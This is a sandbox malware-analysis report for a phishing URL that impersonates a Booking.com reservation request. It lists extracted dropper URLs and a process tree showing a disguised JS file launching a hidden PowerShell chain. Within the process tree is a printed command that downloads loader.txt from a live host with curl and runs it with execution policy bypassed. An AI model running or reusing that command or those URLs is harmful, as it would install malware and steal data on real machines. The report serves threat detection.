Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://amerian-finan...

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/11/2024, 16:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://amerian-financeiro.papudoproducoes.com/accounts/195363/messages/11/clicks/30515/19?envelope_id=7

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1xx.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1type.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1tron.vbs.pdf
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1Execute.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1Framework.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1invoke.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1load.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1method.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1msg.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1runpe.txt
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1tron.bat.pdf
exe.dropper

https://hoteltoscanaplaza.com.co/booking/tool/1tron.ps1.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 44 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://amerian-financeiro.papudoproducoes.com/accounts/195363/messages/11/clicks/30515/19?envelope_id=7
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e6546f8,0x7ffe4e654708,0x7ffe4e654718
      2⤵
        PID:4960
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
        2⤵
          PID:232
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4588
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
          2⤵
            PID:4252
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
            2⤵
              PID:1716
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
              2⤵
                PID:2552
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
                2⤵
                  PID:920
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
                  2⤵
                    PID:60
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                    2⤵
                      PID:4464
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4912
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4716 /prefetch:8
                      2⤵
                        PID:1936
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
                        2⤵
                          PID:5000
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
                          2⤵
                            PID:2372
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                            2⤵
                              PID:1212
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
                              2⤵
                                PID:3464
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                                2⤵
                                  PID:4660
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
                                  2⤵
                                    PID:4076
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3596
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                                    2⤵
                                      PID:1220
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Solicitacao de Reserva Colaboradores Amerian Document.pdf _JS4334590324_AMERIAN.MJS.JS"
                                      2⤵
                                      • Checks computer location settings
                                      PID:4504
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://account.booking.com/sign-in?op_token=EgVvYXV0aCJHChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoCe31CBGNvZGUqEjCk3OzCvbMlOgBCAFjunbCQBg
                                        3⤵
                                          PID:4500
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffe4e6546f8,0x7ffe4e654708,0x7ffe4e654718
                                            4⤵
                                              PID:876
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command $teste1 = ('C:\Users\' + [System.Environment]::UserName + '\AppData\Roaming\teste.ps1') ;curl.exe https://hoteltoscanaplaza.com.co/booking/tool/loader.txt -o $teste1 ;powershell.exe -ExecutionPolicy Bypass -file $teste1 ;
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4528
                                            • C:\Windows\system32\curl.exe
                                              "C:\Windows\system32\curl.exe" https://hoteltoscanaplaza.com.co/booking/tool/loader.txt -o C:\Users\Admin\AppData\Roaming\teste.ps1
                                              4⤵
                                                PID:2232
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file C:\Users\Admin\AppData\Roaming\teste.ps1
                                                4⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops startup file
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2928
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\1tron.vbs"
                                                  5⤵
                                                  • Checks computer location settings
                                                  PID:2492
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\1tron.bat" "
                                                    6⤵
                                                      PID:4728
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.e"xe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\1tron.ps1"
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5072
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                          8⤵
                                                            PID:3720
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Public\1tron.vbs"
                                                      5⤵
                                                      • Checks computer location settings
                                                      PID:4652
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\1tron.bat" "
                                                        6⤵
                                                          PID:4792
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.e"xe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\1tron.ps1"
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3164
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
                                                  2⤵
                                                    PID:4796
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
                                                    2⤵
                                                      PID:4904
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5332 /prefetch:8
                                                      2⤵
                                                        PID:3660
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6896 /prefetch:8
                                                        2⤵
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3788
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
                                                        2⤵
                                                          PID:3356
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5340 /prefetch:2
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2884
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:1664
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:3600
                                                          • C:\Windows\system32\AUDIODG.EXE
                                                            C:\Windows\system32\AUDIODG.EXE 0x510 0x448
                                                            1⤵
                                                              PID:2332

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                              Filesize

                                                              3KB

                                                              MD5

                                                              fe614eeb389ef6c3fe10929ae828f952

                                                              SHA1

                                                              22990055ff48007b4d67fdf14fcaf6982ed73a64

                                                              SHA256

                                                              04e49ed3cb3de3e8b8fd47d7c6614c2c8f5fa86078e2d556f32ad32999bf2e81

                                                              SHA512

                                                              f64d97850c2f632bb9417d5e5a567625a6c317d65c64162d4ae298571b84419a3add06a9ddb1535144a9af5fa3f4c1517625a678424475668ca373afb41c1e91

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                              Filesize

                                                              152B

                                                              MD5

                                                              e55832d7cd7e868a2c087c4c73678018

                                                              SHA1

                                                              ed7a2f6d6437e907218ffba9128802eaf414a0eb

                                                              SHA256

                                                              a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574

                                                              SHA512

                                                              897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                              Filesize

                                                              152B

                                                              MD5

                                                              c2d9eeb3fdd75834f0ac3f9767de8d6f

                                                              SHA1

                                                              4d16a7e82190f8490a00008bd53d85fb92e379b0

                                                              SHA256

                                                              1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66

                                                              SHA512

                                                              d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                              Filesize

                                                              504B

                                                              MD5

                                                              81d296fb70c05057aefacc42a7d4eab0

                                                              SHA1

                                                              83ab56c2772272997a9898b1d93338c04c1f2ed2

                                                              SHA256

                                                              1f72263b39d37d3e0b138917d8e6b4da51fd855f8a6e4deae7a3aec6bdf18570

                                                              SHA512

                                                              c26de9053044abc492cc879d553ced71cf66f1076fd68947dc5e0593124e99bb813ca240199a31825a3c7bc8c7b35276bf6c5c2f2d6b6f28146e721093e4b45c

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                              Filesize

                                                              5KB

                                                              MD5

                                                              6641e96c564c70b567c147a50156ac22

                                                              SHA1

                                                              9de0c89d22537bcb6fccef042230013b2942b6d3

                                                              SHA256

                                                              57a6a0199b960052a215f6785fcb5e20b7ad68714a994d8a07b817b0a5ef0b19

                                                              SHA512

                                                              2deac3f6cf11cc33ce4d32f18f87bfa0657a10f5453a1f0c4ae4bc3eaa40062a5c034098691cfd6d6810b57e89ce62b558006c824986e689e98f93f5a0a7494b

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                              Filesize

                                                              7KB

                                                              MD5

                                                              6df7af19d3a622fc3ca11e00be7ab817

                                                              SHA1

                                                              36e47c0845f8752c95f0ffbbd7f1d9a38d2156ce

                                                              SHA256

                                                              d836f3a86940913dbd98ed921f440fdf4dbdd3449dffde824e0021f8731fd3b9

                                                              SHA512

                                                              35ee30419019dd751a461a74ada4b3def07f65d658f850876ee8a7410658c5d2f5779b3b4966d7898ee8d9d6b1f319fdb9f0d5db9c66016fdaf26385c8610e8a

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                              Filesize

                                                              6KB

                                                              MD5

                                                              dde2a2cc73132ada4b46fcfcedabbcfd

                                                              SHA1

                                                              9e53b374e550f4d3a9bd8bb096531a3873e68b46

                                                              SHA256

                                                              bb3ac6e359acde3c1c38e6b2e6fc3a333c811f04c69e4c76bc20da830f8e39f6

                                                              SHA512

                                                              36d1d23ee008c617b1bbda363328523b1d75e75c92a6857eee629aba4c879005111c3367fd9407f73ab32fd10598a6b000686c6b04628e919f9af7f24078a1ab

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                              Filesize

                                                              6KB

                                                              MD5

                                                              21c2faab81f3558319d3eb8969aaecfa

                                                              SHA1

                                                              9920b6063e35316546b8312a095156f73d13bbc2

                                                              SHA256

                                                              e9b3f75f872b1845292f0d5d85d3235974ec40617e13b26a07282341392a69b4

                                                              SHA512

                                                              d83b6ce73028c32e1ae3ab8d8897ac1cff0b7d7352a9da95544294da2eff5f83a2b45dd1e6f0e5b013508442ef3291fdeafb56fa9a8619f0dd96a88eaa0293a8

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              deb0bc389b04c07223d57a0c0fc4416f

                                                              SHA1

                                                              f0098b74bbe51444103aa54fadc98a4119c7b9c9

                                                              SHA256

                                                              9a7d30ada86dff1d2f5a43b64c89779070929e122cfab9a2d5eced2adaa3777e

                                                              SHA512

                                                              15c917ee0930c6e4dd8e47e505e58c3322e3e621385e39973c904a4334940dbc9781f7a3f1c3ff0203609bac0d7ab35c3868faf5ba3989eaf27a0799b306fc70

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5992d0.TMP
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              5e0a8594df4191515dd7c3899ff6eabf

                                                              SHA1

                                                              7f85341b1bdf8935275f9ac1e8b9e471def0e6a9

                                                              SHA256

                                                              c724d6bf08f6a9d54e43d26ea0d8a0681324ff70a7b302423e90e996e5fc4715

                                                              SHA512

                                                              405b451f3b47f5f61f1ee67ec18cdc5d5a7b2bf6951268dbcfd974324567b91ae4ba559a694cc0a8ab03e313489bf7c535d5863eb7d6beb5287b96159afd022e

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                              Filesize

                                                              16B

                                                              MD5

                                                              46295cac801e5d4857d09837238a6394

                                                              SHA1

                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                              SHA256

                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                              SHA512

                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                              Filesize

                                                              16B

                                                              MD5

                                                              206702161f94c5cd39fadd03f4014d98

                                                              SHA1

                                                              bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                              SHA256

                                                              1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                              SHA512

                                                              0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                              Filesize

                                                              11KB

                                                              MD5

                                                              d9deddd7ea20002099d4d0c257d54161

                                                              SHA1

                                                              b14d2d375949412bf59b3b530bef2e1f6dc34b7f

                                                              SHA256

                                                              2d23f9594e7b672f9ed094072a551471ce47e9ef252c0ec691c1dd7672c49a0e

                                                              SHA512

                                                              ed72f07032135f743b7462f1c965b03af01fd4b8c5a25192fd47f94220c896c15f9cc3ed0de5377b512c972de4b4ef2d52e0bbe4189694682f2556a59a4a2897

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                              Filesize

                                                              10KB

                                                              MD5

                                                              d60b2de216dfa9008d3189567f5dd1e7

                                                              SHA1

                                                              15d3868a627e039c6eb32849c37aa9dad6ce0efc

                                                              SHA256

                                                              9b4d4842e6de6712abf013f7d31f32a58b87a231208e271173c919da4bc0264a

                                                              SHA512

                                                              cc398357a63b5af89897f86213a2bdb1ed127fa7a05474b1c1018f3c21a8fc72e682df00c8f0220041cc228120a83d45a7eaefa8fa15da0d60777a85d5aeb36a

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                              Filesize

                                                              10KB

                                                              MD5

                                                              7737a0d96d448e3e11fbe26b469fcffd

                                                              SHA1

                                                              1f544f0a5bffb8b2ce4623c22670fed5e34f4c7f

                                                              SHA256

